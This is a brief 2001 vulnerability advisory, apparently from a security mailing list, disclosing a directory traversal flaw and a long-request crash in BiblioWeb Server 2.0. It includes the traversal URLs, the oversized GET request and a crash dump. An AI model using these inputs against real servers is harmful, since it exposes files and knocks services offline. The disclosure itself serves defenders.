To Ben Greenbaum:

    Please post this advisory instead of the last.  I needed to
make a minor change to the 'Vendor Status' section.  Thanks.
----------

Vulnerabilities in BiblioWeb Server



    Overview

BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com.  A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.



    Details

To break out of the web root, use the following URLs:

        http://localhost/..\[file outside web root]
        http://localhost/...\[file outside web root]

To crash the server, telnet to port 80, and send:

        GET /[a lot of 'A's]

    The server crashes with the following dump:


BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
Registers:
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:




    Solution

No quick fix is possible.



    Vendor Status

CG Information was contacted via <[EMAIL PROTECTED]> on Monday,
January 29, 2001.  No reply was received.



        - Joe Testa  ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron
)

Reply via email to